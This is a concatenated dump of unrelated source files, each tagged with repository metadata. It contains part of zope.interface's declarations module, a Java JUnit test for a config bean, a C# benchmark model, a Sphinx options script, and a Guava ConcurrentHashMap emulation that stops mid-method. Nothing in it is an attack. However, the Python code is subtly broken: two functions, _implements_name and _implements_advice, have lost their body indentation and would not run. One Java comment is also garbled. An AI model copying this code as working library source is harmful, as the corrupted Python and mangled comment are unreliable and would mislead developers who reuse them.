        # interface found in ``other``.
        return Declaration(
            *[i for i in self.interfaces()
                if not [j for j in other.interfaces()
                        if i.extends(j, 0)]
                ]
            )
    def __add__(self, other):
        """Add two specifications or a specification and an interface
        """
        # Preserve order: our interfaces first, then any new ones from
        # ``other``; duplicates are dropped.
        seen = {}
        result = []
        for i in self.interfaces():
            seen[i] = 1
            result.append(i)
        for i in other.interfaces():
            if i not in seen:
                seen[i] = 1
                result.append(i)
        return Declaration(*result)
    __radd__ = __add__
##############################################################################
#
# Implementation specifications
#
# These specify interfaces implemented by instances of classes
class Implements(Declaration):
    """Declaration of the interfaces implemented by a class' instances.

    Ordering support (``__lt__`` etc.) compares by ``(__name__,
    __module__)`` so these can live alongside InterfaceClass instances
    in sorted containers; equality and hashing remain identity based.
    """
    # class whose specification should be used as additional base
    inherit = None
    # interfaces actually declared for a class
    declared = ()
    # placeholder until a real name is assigned (see named())
    __name__ = '?'
    @classmethod
    def named(cls, name, *interfaces):
        # Implementation method: Produce an Implements interface with
        # a fully fleshed out __name__ before calling the constructor, which
        # sets bases to the given interfaces and which may pass this object to
        # other objects (e.g., to adjust dependents). If they're sorting or comparing
        # by name, this needs to be set.
        inst = cls.__new__(cls)
        inst.__name__ = name
        inst.__init__(*interfaces)
        return inst
    def __repr__(self):
        return '<implementedBy %s>' % (self.__name__)
    def __reduce__(self):
        # Pickle as a call to implementedBy() on the originating class,
        # so unpickling goes back through the cache.
        return implementedBy, (self.inherit, )
    def __cmp(self, other):
        # Yes, I did mean to name this __cmp, rather than __cmp__.
        # It is a private method used by __lt__ and __gt__.
        # This is based on, and compatible with, InterfaceClass.
        # (The two must be mutually comparable to be able to work in e.g., BTrees.)
        # Instances of this class generally don't have a __module__ other than
        # `zope.interface.declarations`, whereas they *do* have a __name__ that is the
        # fully qualified name of the object they are representing.
        # Note, though, that equality and hashing are still identity based. This
        # accounts for things like nested objects that have the same name (typically
        # only in tests) and is consistent with pickling. As far as comparisons to InterfaceClass
        # goes, we'll never have equal name and module to those, so we're still consistent there.
        # Instances of this class are essentially intended to be unique and are
        # heavily cached (note how our __reduce__ handles this) so having identity
        # based hash and eq should also work.
        if other is None:
            return -1
        n1 = (self.__name__, self.__module__)
        n2 = (getattr(other, '__name__', ''), getattr(other, '__module__', ''))
        # This spelling works under Python3, which doesn't have cmp().
        return (n1 > n2) - (n1 < n2)
    def __hash__(self):
        return Declaration.__hash__(self)
    # We want equality to be based on identity. However, we can't actually
    # implement __eq__/__ne__ to do this because sometimes we get wrapped in a proxy.
    # We need to let the proxy types implement these methods so they can handle unwrapping
    # and then rely on: (1) the interpreter automatically changing `implements == proxy` into
    # `proxy == implements` (which will call proxy.__eq__ to do the unwrapping) and then
    # (2) the default equality semantics being identity based.
    def __lt__(self, other):
        c = self.__cmp(other)
        return c < 0
    def __le__(self, other):
        c = self.__cmp(other)
        return c <= 0
    def __gt__(self, other):
        c = self.__cmp(other)
        return c > 0
    def __ge__(self, other):
        c = self.__cmp(other)
        return c >= 0
def _implements_name(ob):
# Return the __name__ attribute to be used by its __implemented__
# property.
# This must be stable for the "same" object across processes
# because it is used for sorting. It needn't be unique, though, in cases
# like nested classes named Foo created by different functions, because
# equality and hashing is still based on identity.
# It might be nice to use __qualname__ on Python 3, but that would produce
# different values between Py2 and Py3.
return (getattr(ob, '__module__', '?') or '?') + \
'.' + (getattr(ob, '__name__', '?') or '?')
def implementedByFallback(cls):
    """Return the interfaces implemented for a class' instances

    The value returned is an IDeclaration.

    The computed spec is cached on the class as ``__implemented__``
    (or in BuiltinImplementationSpecifications when the class cannot
    be written to), so repeated calls are cheap.
    """
    try:
        spec = cls.__dict__.get('__implemented__')
    except AttributeError:
        # we can't get the class dict. This is probably due to a
        # security proxy. If this is the case, then probably no
        # descriptor was installed for the class.
        # We don't want to depend directly on zope.security in
        # zope.interface, but we'll try to make reasonable
        # accommodations in an indirect way.
        # We'll check to see if there's an implements:
        spec = getattr(cls, '__implemented__', None)
        if spec is None:
            # There's no spec stored in the class. Maybe it's a builtin:
            spec = BuiltinImplementationSpecifications.get(cls)
            if spec is not None:
                return spec
            return _empty
        if spec.__class__ == Implements:
            # we defaulted to _empty or there was a spec. Good enough.
            # Return it.
            return spec
        # TODO: need old style __implements__ compatibility?
        # Hm, there's an __implemented__, but it's not a spec. Must be
        # an old-style declaration. Just compute a spec for it
        return Declaration(*_normalizeargs((spec, )))
    if isinstance(spec, Implements):
        # Cached spec found directly in the class dict; done.
        return spec
    if spec is None:
        spec = BuiltinImplementationSpecifications.get(cls)
        if spec is not None:
            return spec
    # TODO: need old style __implements__ compatibility?
    spec_name = _implements_name(cls)
    if spec is not None:
        # old-style __implemented__ = foo declaration
        spec = (spec, ) # tuplefy, as it might be just an int
        spec = Implements.named(spec_name, *_normalizeargs(spec))
        spec.inherit = None    # old-style implies no inherit
        del cls.__implemented__ # get rid of the old-style declaration
    else:
        # No declaration at all: derive one from the base classes.
        try:
            bases = cls.__bases__
        except AttributeError:
            if not callable(cls):
                raise TypeError("ImplementedBy called for non-factory", cls)
            bases = ()
        spec = Implements.named(spec_name, *[implementedBy(c) for c in bases])
        spec.inherit = cls
    try:
        # Cache the spec on the class, and install the descriptors the
        # rest of the machinery expects.
        cls.__implemented__ = spec
        if not hasattr(cls, '__providedBy__'):
            cls.__providedBy__ = objectSpecificationDescriptor
        if (isinstance(cls, DescriptorAwareMetaClasses)
            and
            '__provides__' not in cls.__dict__):
            # Make sure we get a __provides__ descriptor
            cls.__provides__ = ClassProvides(
                cls,
                getattr(cls, '__class__', type(cls)),
                )
    except TypeError:
        # Builtins refuse attribute writes; cache in the registry instead.
        if not isinstance(cls, type):
            raise TypeError("ImplementedBy called for non-type", cls)
        BuiltinImplementationSpecifications[cls] = spec
    return spec
# Overridden below by the C implementation when available.
implementedBy = implementedByFallback
def classImplementsOnly(cls, *interfaces):
    """Declare the only interfaces implemented by instances of a class

    The arguments after the class are one or more interfaces or interface
    specifications (``IDeclaration`` objects).

    The interfaces given (including the interfaces in the specifications)
    replace any previous declarations.
    """
    # Wipe any prior declaration (and the inherited-bases contribution),
    # then delegate to classImplements to install the new one.
    spec = implementedBy(cls)
    spec.declared = ()
    spec.inherit = None
    classImplements(cls, *interfaces)
def classImplements(cls, *interfaces):
    """Declare additional interfaces implemented for instances of a class

    The arguments after the class are one or more interfaces or
    interface specifications (``IDeclaration`` objects).

    The interfaces given (including the interfaces in the
    specifications) are added to any interfaces previously declared.
    """
    spec = implementedBy(cls)
    # Append the newly declared interfaces to whatever was declared before.
    spec.declared += tuple(_normalizeargs(interfaces))

    # Rebuild the spec's bases: every declared interface first
    # (deduplicated, first occurrence wins), then the implements specs
    # of the inherited class' bases, skipping any already present.
    seen = set()
    bases = []
    for candidate in spec.declared:
        if candidate not in seen:
            seen.add(candidate)
            bases.append(candidate)
    if spec.inherit is not None:
        for base_cls in spec.inherit.__bases__:
            candidate = implementedBy(base_cls)
            if candidate not in seen:
                seen.add(candidate)
                bases.append(candidate)
    spec.__bases__ = tuple(bases)
def _implements_advice(cls):
interfaces, classImplements = cls.__dict__['__implements_advice_data__']
del cls.__implements_advice_data__
classImplements(cls, *interfaces)
return cls
class implementer:
    """Declare the interfaces implemented by instances of a class.

    This function is called as a class decorator.

    The arguments are one or more interfaces or interface
    specifications (IDeclaration objects).

    The interfaces given (including the interfaces in the
    specifications) are added to any interfaces previously
    declared.

    Previous declarations include declarations for base classes
    unless implementsOnly was used.

    This function is provided for convenience. It provides a more
    convenient way to call classImplements. For example::

        @implementer(I1)
        class C(object):
            pass

    is equivalent to calling::

        classImplements(C, I1)

    after the class has been created.
    """
    def __init__(self, *interfaces):
        # Interfaces to declare when the decorator is applied.
        self.interfaces = interfaces
    def __call__(self, ob):
        if isinstance(ob, DescriptorAwareMetaClasses):
            # Normal class: record through the standard machinery.
            classImplements(ob, *self.interfaces)
            return ob
        # Not a class (e.g. a factory callable): attach an Implements
        # spec directly, if the object allows attribute writes.
        spec_name = _implements_name(ob)
        spec = Implements.named(spec_name, *self.interfaces)
        try:
            ob.__implemented__ = spec
        except AttributeError:
            raise TypeError("Can't declare implements", ob)
        return ob
class implementer_only:
    """Declare the only interfaces implemented by instances of a class

    This class decorator takes one or more interfaces or interface
    specifications (IDeclaration objects) and makes them the complete
    declaration: previous declarations, including those for base
    classes, are overridden.

    It is the decorator counterpart of ``classImplementsOnly``::

        @implementer_only(I1)
        class C(object): pass

    is equivalent to calling ``classImplementsOnly(C, I1)`` after the
    class has been created.
    """

    def __init__(self, *interfaces):
        # Interfaces to declare when the decorator is applied.
        self.interfaces = interfaces

    def __call__(self, ob):
        # Functions and methods cannot meaningfully carry an
        # "implements only" declaration (there is no inheritance of
        # interfaces on them), so reject those outright.
        if isinstance(ob, (FunctionType, MethodType)):
            raise ValueError('The implementer_only decorator is not '
                             'supported for methods or functions.')
        # Anything else is assumed to be a class.
        classImplementsOnly(ob, *self.interfaces)
        return ob
def _implements(name, interfaces, classImplements):
    """Python-2-only helper shared by implements()/implementsOnly().

    Stashes ``(interfaces, classImplements)`` in the calling class
    body's locals and registers ``_implements_advice`` to run when the
    class statement finishes.
    """
    # This entire approach is invalid under Py3K. Don't even try to fix
    # the coverage for this block there. :(
    # Depth 2: skip this frame and the implements()/implementsOnly()
    # wrapper to reach the class body being defined.
    frame = sys._getframe(2)
    locals = frame.f_locals
    # Try to make sure we were called from a class def. In 2.2.0 we can't
    # check for __module__ since it doesn't seem to be added to the locals
    # until later on.
    if locals is frame.f_globals or '__module__' not in locals:
        raise TypeError(name+" can be used only from a class definition.")
    if '__implements_advice_data__' in locals:
        raise TypeError(name+" can be used only once in a class definition.")
    locals['__implements_advice_data__'] = interfaces, classImplements
    advicemod.addClassAdvisor(_implements_advice, depth=3)
def implements(*interfaces):
    """Declare interfaces implemented by instances of a class

    This function is called in a class definition (Python 2 only; under
    Python 3 it raises TypeError directing you to @implementer).

    The arguments are one or more interfaces or interface
    specifications (IDeclaration objects).

    The interfaces given (including the interfaces in the
    specifications) are added to any interfaces previously
    declared.

    Previous declarations include declarations for base classes
    unless implementsOnly was used.

    This function is provided for convenience. It provides a more
    convenient way to call classImplements. For example::

        implements(I1)

    is equivalent to calling::

        classImplements(C, I1)

    after the class has been created.
    """
    # This entire approach is invalid under Py3K. Don't even try to fix
    # the coverage for this block there. :(
    if PYTHON3:
        raise TypeError(_ADVICE_ERROR % 'implementer')
    _implements("implements", interfaces, classImplements)
def implementsOnly(*interfaces):
    """Declare the only interfaces implemented by instances of a class

    This function is called in a class definition (Python 2 only; under
    Python 3 it raises TypeError directing you to @implementer_only).

    The arguments are one or more interfaces or interface
    specifications (IDeclaration objects).

    Previous declarations including declarations for base classes
    are overridden.

    This function is provided for convenience. It provides a more
    convenient way to call classImplementsOnly. For example::

        implementsOnly(I1)

    is equivalent to calling::

        classImplementsOnly(I1)

    after the class has been created.
    """
    # This entire approach is invalid under Py3K. Don't even try to fix
    # the coverage for this block there. :(
    if PYTHON3:
        raise TypeError(_ADVICE_ERROR % 'implementer_only')
    _implements("implementsOnly", interfaces, classImplementsOnly)
##############################################################################
#
# Instance declarations
class Provides(Declaration):  # Really named ProvidesClass
    """Implement __provides__, the instance-specific specification

    When an object is pickled, we pickle the interfaces that it implements.
    """
    def __init__(self, cls, *interfaces):
        # Keep the constructor args for __reduce__, and the class so the
        # descriptor protocol below can tell who it was defined for.
        self.__args = (cls, ) + interfaces
        self._cls = cls
        # Bases are the directly provided interfaces plus whatever the
        # class itself implements.
        Declaration.__init__(self, *(interfaces + (implementedBy(cls), )))
    def __reduce__(self):
        # Pickles as a call to the module-level Provides() factory, so
        # unpickling goes through the instance-declaration cache.
        return Provides, self.__args
    # Present this class as living in the package root; presumably this
    # matters for pickling by name -- TODO confirm.
    __module__ = 'zope.interface'
    def __get__(self, inst, cls):
        """Make sure that a class __provides__ doesn't leak to an instance
        """
        if inst is None and cls is self._cls:
            # We were accessed through a class, so we are the class'
            # provides spec. Just return this object, but only if we are
            # being called on the same class that we were defined for:
            return self
        raise AttributeError('__provides__')
# Preserve a reference to the class before the name ``Provides`` is
# rebound to the caching factory function defined below.
ProvidesClass = Provides
# Registry of instance declarations.
# This is a memory optimization to allow objects to share specifications:
# values are held weakly so unused declarations can be collected.
InstanceDeclarations = weakref.WeakValueDictionary()
def Provides(*interfaces):
    """Cache instance declarations

    Declarations are shared among instances that provide the same
    interfaces: the first request builds a ``ProvidesClass`` and caches
    it in a weak value dictionary; later requests with the same
    interface tuple get the cached object back.
    """
    try:
        # Fast path: an identical declaration is already cached.
        return InstanceDeclarations[interfaces]
    except KeyError:
        spec = ProvidesClass(*interfaces)
        InstanceDeclarations[interfaces] = spec
        return spec

# Allow the pickle machinery to call Provides() when unpickling.
Provides.__safe_for_unpickling__ = True
def directlyProvides(object, *interfaces):
    """Declare interfaces declared directly for an object

    The arguments after the object are one or more interfaces or interface
    specifications (``IDeclaration`` objects).

    The interfaces given (including the interfaces in the specifications)
    replace interfaces previously declared for the object.
    """
    cls = getattr(object, '__class__', None)
    if cls is not None and getattr(cls, '__class__', None) is cls:
        # It's a meta class (well, at least it could be an extension class)
        # Note that we can't get here from Py3k tests:  there is no normal
        # class which isn't descriptor aware.
        if not isinstance(object,
                          DescriptorAwareMetaClasses):
            raise TypeError("Attempt to make an interface declaration on a "
                            "non-descriptor-aware class")
    interfaces = _normalizeargs(interfaces)
    if cls is None:
        cls = type(object)
    # Decide whether the target is itself a class/type (descriptor-aware
    # metaclass instance) or a plain instance.
    issub = False
    for damc in DescriptorAwareMetaClasses:
        if issubclass(cls, damc):
            issub = True
            break
    if issub:
        # we have a class or type.  We'll use a special descriptor
        # that provides some extra caching
        object.__provides__ = ClassProvides(object, cls, *interfaces)
    else:
        # Plain instance: the shared, cached Provides declaration is enough.
        object.__provides__ = Provides(cls, *interfaces)
def alsoProvides(object, *interfaces):
    """Declare interfaces declared directly for an object

    The arguments after the object are one or more interfaces or interface
    specifications (``IDeclaration`` objects).

    The interfaces given (including the interfaces in the specifications) are
    added to the interfaces previously declared for the object.
    """
    # Additive variant of directlyProvides: keep what was already
    # directly provided and append the new interfaces.
    directlyProvides(object, directlyProvidedBy(object), *interfaces)
def noLongerProvides(object, interface):
    """ Removes a directly provided interface from an object.

    Raises ValueError when the interface is still provided afterwards
    (e.g. because the object's class implements it), since then the
    removal cannot actually take effect.
    """
    directlyProvides(object, directlyProvidedBy(object) - interface)
    if interface.providedBy(object):
        raise ValueError("Can only remove directly provided interfaces.")
class ClassProvidesBaseFallback(object):
    """Descriptor base for class-level ``__provides__``.

    Subclasses set ``_cls`` (the class the descriptor was defined for)
    and ``_implements`` (the spec to hand to that class' instances).
    """
    def __get__(self, inst, cls):
        if cls is self._cls:
            # We only work if called on the class we were defined for
            if inst is None:
                # We were accessed through a class, so we are the class'
                # provides spec. Just return this object as is:
                return self
            # Accessed through an instance: fall back to what the class
            # implements for its instances.
            return self._implements
        raise AttributeError('__provides__')
ClassProvidesBasePy = ClassProvidesBaseFallback # BBB: old public alias
ClassProvidesBase = ClassProvidesBaseFallback
# Try to get C base: the optional extension module overrides the
# pure-Python fallback when it is available.
try:
    from ._zope_interface_coptimizations import ClassProvidesBase
except ImportError:
    pass
class ClassProvides(Declaration, ClassProvidesBase):
    """Special descriptor for class __provides__

    The descriptor caches the implementedBy info, so that
    we can get declarations for objects without instance-specific
    interfaces a bit quicker.
    """
    def __init__(self, cls, metacls, *interfaces):
        self._cls = cls
        # Cache what instances of cls provide, for the descriptor's
        # instance-access path (see ClassProvidesBase.__get__).
        self._implements = implementedBy(cls)
        # Keep the constructor args for pickling via __reduce__.
        self.__args = (cls, metacls, ) + interfaces
        # The class itself provides the declared interfaces plus whatever
        # its metaclass implements.
        Declaration.__init__(self, *(interfaces + (implementedBy(metacls), )))
    def __reduce__(self):
        return self.__class__, self.__args
    # Copy base-class method for speed
    __get__ = ClassProvidesBase.__get__
def directlyProvidedBy(object):
    """Return the interfaces directly provided by the given object

    The value returned is an ``IDeclaration``.
    """
    provides = getattr(object, "__provides__", None)
    if (provides is None # no spec
        or
        # We might have gotten the implements spec, as an
        # optimization. If so, it's like having only one base, that we
        # lop off to exclude class-supplied declarations:
        isinstance(provides, Implements)
        ):
        return _empty
    # Strip off the class part of the spec:
    # (the last base is the implementedBy contribution added by
    # Provides/ClassProvides; everything before it was declared directly)
    return Declaration(provides.__bases__[:-1])
def classProvides(*interfaces):
    """Declare interfaces provided directly by a class

    This function is called in a class definition (Python 2 only; under
    Python 3 it raises TypeError directing you to @provider).

    The arguments are one or more interfaces or interface specifications
    (``IDeclaration`` objects).

    The given interfaces (including the interfaces in the specifications)
    are used to create the class's direct-object interface specification.
    An error will be raised if the class already has a direct interface
    specification. In other words, it is an error to call this function more
    than once in a class definition.

    Note that the given interfaces have nothing to do with the interfaces
    implemented by instances of the class.

    This function is provided for convenience. It provides a more convenient
    way to call directlyProvides for a class. For example::

      classProvides(I1)

    is equivalent to calling::

      directlyProvides(theclass, I1)

    after the class has been created.
    """
    # This entire approach is invalid under Py3K. Don't even try to fix
    # the coverage for this block there. :(
    if PYTHON3:
        raise TypeError(_ADVICE_ERROR % 'provider')
    # Depth 1: the frame of the class body that called us.
    frame = sys._getframe(1)
    locals = frame.f_locals
    # Try to make sure we were called from a class def
    if (locals is frame.f_globals) or ('__module__' not in locals):
        raise TypeError("classProvides can be used only from a "
                        "class definition.")
    if '__provides__' in locals:
        raise TypeError(
            "classProvides can only be used once in a class definition.")
    # Park the normalized interfaces in the class body; the advisor
    # converts them into a real declaration once the class exists.
    locals["__provides__"] = _normalizeargs(interfaces)
    advicemod.addClassAdvisor(_classProvides_advice, depth=2)
def _classProvides_advice(cls):
    """Class-advice callback backing the Py2-only ``classProvides``.

    ``classProvides`` parks the normalized interfaces in the class
    namespace under ``__provides__``; this advisor pops that temporary
    entry and turns it into a real direct-provides declaration.

    This entire approach is invalid under Py3K, so no coverage is
    expected for this block there.
    """
    pending = cls.__dict__['__provides__']
    # Drop the placeholder before declaring, so directlyProvides can
    # install the proper descriptor in its place.
    del cls.__provides__
    directlyProvides(cls, *pending)
    return cls
class provider:
    """Class decorator version of classProvides

    ``@provider(I1)`` declares that the decorated object itself (for a
    class: the class object, not its instances) directly provides the
    given interfaces.
    """

    def __init__(self, *interfaces):
        # Interfaces to declare when the decorator is applied.
        self.interfaces = interfaces

    def __call__(self, ob):
        directlyProvides(ob, *self.interfaces)
        # Hand the object back unchanged so the decorator is transparent.
        return ob
def moduleProvides(*interfaces):
    """Declare interfaces provided by a module

    This function is used in a module definition.

    The arguments are one or more interfaces or interface specifications
    (``IDeclaration`` objects).

    The given interfaces (including the interfaces in the specifications) are
    used to create the module's direct-object interface specification. An
    error will be raised if the module already has an interface specification.
    In other words, it is an error to call this function more than once in a
    module definition.

    This function is provided for convenience. It provides a more convenient
    way to call directlyProvides. For example::

      moduleProvides(I1)

    is equivalent to::

      directlyProvides(sys.modules[__name__], I1)
    """
    # Depth 1: the module body that called us.
    frame = sys._getframe(1)
    locals = frame.f_locals
    # Try to make sure we were called from a module body (module-level
    # locals ARE the globals, the opposite of the class-body check above).
    if (locals is not frame.f_globals) or ('__name__' not in locals):
        raise TypeError(
            "moduleProvides can only be used from a module definition.")
    if '__provides__' in locals:
        raise TypeError(
            "moduleProvides can only be used once in a module definition.")
    # Modules are plain instances of ModuleType, so a Provides
    # declaration can be installed directly.
    locals["__provides__"] = Provides(ModuleType,
                                      *_normalizeargs(interfaces))
##############################################################################
#
# Declaration querying support
# XXX: is this a fossil? Nobody calls it, no unit tests exercise it, no
# doctests import it, and the package __init__ doesn't import it.
def ObjectSpecification(direct, cls):
    """Provide object specifications

    These combine information for the object and for its classes.

    Apparently a fossil: nothing in this module or its tests calls it;
    kept for backward compatibility.
    """
    return Provides(cls, direct) # pragma: no cover fossil
def getObjectSpecificationFallback(ob):
    """Return the interface specification for an arbitrary object.

    Preference order: a genuine ``__provides__`` spec found on the
    object, then ``implementedBy`` of its class, then the empty
    declaration for class-less oddballs.
    """
    provides = getattr(ob, '__provides__', None)
    if provides is not None and isinstance(provides, SpecificationBase):
        return provides
    try:
        cls = ob.__class__
    except AttributeError:
        # No class and no usable __provides__: nothing is provided.
        return _empty
    return implementedBy(cls)

# Overridden below by the C implementation when available.
getObjectSpecification = getObjectSpecificationFallback
def providedByFallback(ob):
    """Return the specification of interfaces provided by ``ob``.

    Here we have either a special object, an old-style declaration
    or a descriptor; the cascade below works out which.
    """
    # Try to get __providedBy__
    try:
        r = ob.__providedBy__
    except AttributeError:
        # Not set yet. Fall back to lower-level thing that computes it
        return getObjectSpecification(ob)
    try:
        # We might have gotten a descriptor from an instance of a
        # class (like an ExtensionClass) that doesn't support
        # descriptors.  We'll make sure we got one by trying to get
        # the only attribute, which all specs have.
        r.extends
    except AttributeError:
        # The object's class doesn't understand descriptors.
        # Sigh. We need to get an object descriptor, but we have to be
        # careful.  We want to use the instance's __provides__, if
        # there is one, but only if it didn't come from the class.
        try:
            r = ob.__provides__
        except AttributeError:
            # No __provides__, so just fall back to implementedBy
            return implementedBy(ob.__class__)
        # We need to make sure we got the __provides__ from the
        # instance. We'll do this by making sure we don't get the same
        # thing from the class:
        try:
            cp = ob.__class__.__provides__
        except AttributeError:
            # The ob doesn't have a class or the class has no
            # provides, assume we're done:
            return r
        if r is cp:
            # Oops, we got the provides from the class. This means
            # the object doesn't have its own. We should use implementedBy
            return implementedBy(ob.__class__)
    return r
# Overridden below by the C implementation when available.
providedBy = providedByFallback
class ObjectSpecificationDescriptorFallback(object):
    """Implement the `__providedBy__` attribute

    The `__providedBy__` attribute computes the interfaces provided by
    an object.
    """
    def __get__(self, inst, cls):
        """Get an object specification for an object
        """
        if inst is None:
            # Class access: delegate to the class-level computation.
            return getObjectSpecification(cls)
        # Instance access: an instance-specific __provides__ wins;
        # otherwise fall back to what the class implements.
        provides = getattr(inst, '__provides__', None)
        if provides is not None:
            return provides
        return implementedBy(cls)
# Overridden below by the C implementation when available.
ObjectSpecificationDescriptor = ObjectSpecificationDescriptorFallback
##############################################################################
def _normalizeargs(sequence, output = None):
    """Normalize declaration arguments

    Normalization arguments might contain Declarations, tuples, or single
    interfaces.

    Anything but individual interfaces or implements specs will be expanded.
    """
    if output is None:
        output = []
    # An InterfaceClass or Implements is a leaf; anything else is
    # treated as a nested sequence and flattened recursively into the
    # shared ``output`` accumulator.
    cls = sequence.__class__
    if InterfaceClass in cls.__mro__ or Implements in cls.__mro__:
        output.append(sequence)
    else:
        for v in sequence:
            _normalizeargs(v, output)
    return output
# The canonical empty declaration, shared wherever "provides nothing"
# is the answer.
_empty = Declaration()
# Prefer the C implementations of the hot-path functions when the
# optional extension module is available; fall back silently to the
# pure-Python versions defined above.
try:
    from ._zope_interface_coptimizations import (
        getObjectSpecification,
        implementedBy,
        ObjectSpecificationDescriptor,
        providedBy,
    )
except ImportError:
    pass
# Shared descriptor instance installed as __providedBy__ on classes
# (see implementedByFallback above).
objectSpecificationDescriptor = ObjectSpecificationDescriptor()
| smmribeiro/intellij-community | plugins/hg4idea/testData/bin/mercurial/thirdparty/zope/interface/declarations.py | Python | apache-2.0 | 30,880 |
/*
* Copyright 2017 StreamSets Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.streamsets.datacollector.restapi.bean;
import com.streamsets.datacollector.restapi.bean.ConfigConfigurationJson;
import com.streamsets.pipeline.api.Config;
import org.junit.Assert;
import org.junit.Test;
public class TestConfigConfigurationBean {

  /** Wrapping a null Config must fail fast with an NPE. */
  @Test(expected = NullPointerException.class)
  public void testConfigConfigurationBeanNull() {
    new ConfigConfigurationJson(null);
  }

  /** The JSON bean must mirror the name/value of the wrapped Config. */
  @Test
  public void testConfigConfigurationBean() {
    Config expected = new Config("url", "http://localhost:9090");
    ConfigConfigurationJson bean = new ConfigConfigurationJson(expected);
    assertMirrors(expected, bean);
  }

  /** The (name, value) constructor must behave exactly like wrapping a Config. */
  @Test
  public void testConfigConfigurationBeanConstructorWithArgs() {
    Config expected = new Config("url", "http://localhost:9090");
    ConfigConfigurationJson bean = new ConfigConfigurationJson("url", "http://localhost:9090");
    assertMirrors(expected, bean);
  }

  /** Shared checks: the bean and its unwrapped Config expose the same name/value. */
  private static void assertMirrors(Config expected, ConfigConfigurationJson bean) {
    Assert.assertEquals(expected.getName(), bean.getName());
    Assert.assertEquals(expected.getValue(), bean.getValue());
    Assert.assertEquals(expected.getName(), bean.getConfigConfiguration().getName());
    Assert.assertEquals(expected.getValue(), bean.getConfigConfiguration().getValue());
  }
}
| rockmkd/datacollector | container/src/test/java/com/streamsets/datacollector/restapi/bean/TestConfigConfigurationBean.java | Java | apache-2.0 | 2,338 |
using System;
namespace Benchmarks.Models
{
    /// <summary>
    /// Flat user entity used as a source/target object in the mapping benchmarks.
    /// </summary>
    public class User
    {
        /// <summary>Unique identifier of the user.</summary>
        public Guid Id { get; set; }
        /// <summary>Login name.</summary>
        public string UserName { get; set; }
        /// <summary>Contact e-mail address.</summary>
        public string Email { get; set; }
        /// <summary>Age in years.</summary>
        public int Age { get; set; }
        /// <summary>Postal address as a single line.</summary>
        public string Address { get; set; }
        /// <summary>Whether the account is currently active.</summary>
        public bool Active { get; set; }
        /// <summary>Soft-delete flag.</summary>
        public bool Deleted { get; set; }
        /// <summary>Creation timestamp.</summary>
        public DateTime CreatedOn { get; set; }
        /// <summary>Role assigned to this user.</summary>
        public Role Role { get; set; }
    }
}
| Excommunicated/ExpressMapper | PerformanceTest/Models/User.cs | C# | apache-2.0 | 460 |
// Sphinx client-side configuration, read by doctools.js/searchtools.js.
var DOCUMENTATION_OPTIONS = {
    // Relative path to the documentation root, injected by the page
    // template through a data attribute on the #documentation_options tag.
    URL_ROOT: document.getElementById("documentation_options").getAttribute('data-url_root'),
    VERSION: '5.3.4',          // version string of the generated docs
    LANGUAGE: 'None',          // Sphinx language setting ('None' when unset)
    COLLAPSE_INDEX: false,     // whether general-index entries start collapsed
    FILE_SUFFIX: '.html',      // suffix of generated pages
    HAS_SOURCE: true,          // whether reST sources are published alongside
    SOURCELINK_SUFFIX: '.txt'  // suffix appended to "show source" links
};
/*
* Copyright (C) 2009 The Guava Authors
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package java.util.concurrent;
import java.util.AbstractMap;
import java.util.Collections;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;
/**
 * Minimal emulation of {@link java.util.concurrent.ConcurrentHashMap}.
 *
 * <p>Because the JavaScript interpreter is single-threaded, no real
 * concurrency control is needed: all operations simply delegate to a
 * {@link java.util.HashMap}, while the extra methods introduced by
 * {@link ConcurrentMap} are implemented on top of it. Null keys and null
 * values are rejected with {@link NullPointerException}, matching the
 * real implementation.
 *
 * @author Hayward Chan
 */
public class ConcurrentHashMap<K, V>
    extends AbstractMap<K, V> implements ConcurrentMap<K, V> {
  /** Single-threaded backing store; every operation delegates here. */
  private final Map<K, V> delegate;
  public ConcurrentHashMap() {
    delegate = new HashMap<K, V>();
  }
  public ConcurrentHashMap(int initialCapacity) {
    delegate = new HashMap<K, V>(initialCapacity);
  }
  public ConcurrentHashMap(int initialCapacity, float loadFactor) {
    delegate = new HashMap<K, V>(initialCapacity, loadFactor);
  }
  public ConcurrentHashMap(Map<? extends K, ? extends V> t) {
    delegate = new HashMap<K, V>(t);
  }
  /** Rejects null references, mirroring the real ConcurrentHashMap contract. */
  private static <T> T checkNotNull(T reference) {
    if (reference == null) {
      throw new NullPointerException();
    }
    return reference;
  }
  @Override public boolean containsKey(Object key) {
    return delegate.containsKey(checkNotNull(key));
  }
  @Override public boolean containsValue(Object value) {
    return delegate.containsValue(checkNotNull(value));
  }
  @Override public V get(Object key) {
    return delegate.get(checkNotNull(key));
  }
  @Override public V put(K key, V value) {
    // Key is validated before value, preserving the original check order.
    return delegate.put(checkNotNull(key), checkNotNull(value));
  }
  @Override public V remove(Object key) {
    return delegate.remove(checkNotNull(key));
  }
  @Override public Set<Entry<K, V>> entrySet() {
    return delegate.entrySet();
  }
  /** Inserts only when the key is absent; returns the value now mapped-from before. */
  public V putIfAbsent(K key, V value) {
    return containsKey(key) ? get(key) : put(key, value);
  }
  /** Removes the entry only when it currently maps to the given value. */
  public boolean remove(Object key, Object value) {
    if (!containsKey(key) || !get(key).equals(value)) {
      return false;
    }
    remove(key);
    return true;
  }
  /** Replaces the value only when the key currently maps to {@code oldValue}. */
  public boolean replace(K key, V oldValue, V newValue) {
    if (oldValue == null || newValue == null) {
      throw new NullPointerException();
    }
    boolean matched = containsKey(key) && get(key).equals(oldValue);
    if (matched) {
      put(key, newValue);
    }
    return matched;
  }
  /** Replaces the value only when the key is already present. */
  public V replace(K key, V value) {
    if (value == null) {
      throw new NullPointerException();
    }
    return containsKey(key) ? put(key, value) : null;
  }
  /** Legacy Hashtable-style alias for {@link #containsValue(Object)}. */
  public boolean contains(Object value) {
    return containsValue(value);
  }
  /** Legacy Hashtable-style enumeration over the values. */
  public Enumeration<V> elements() {
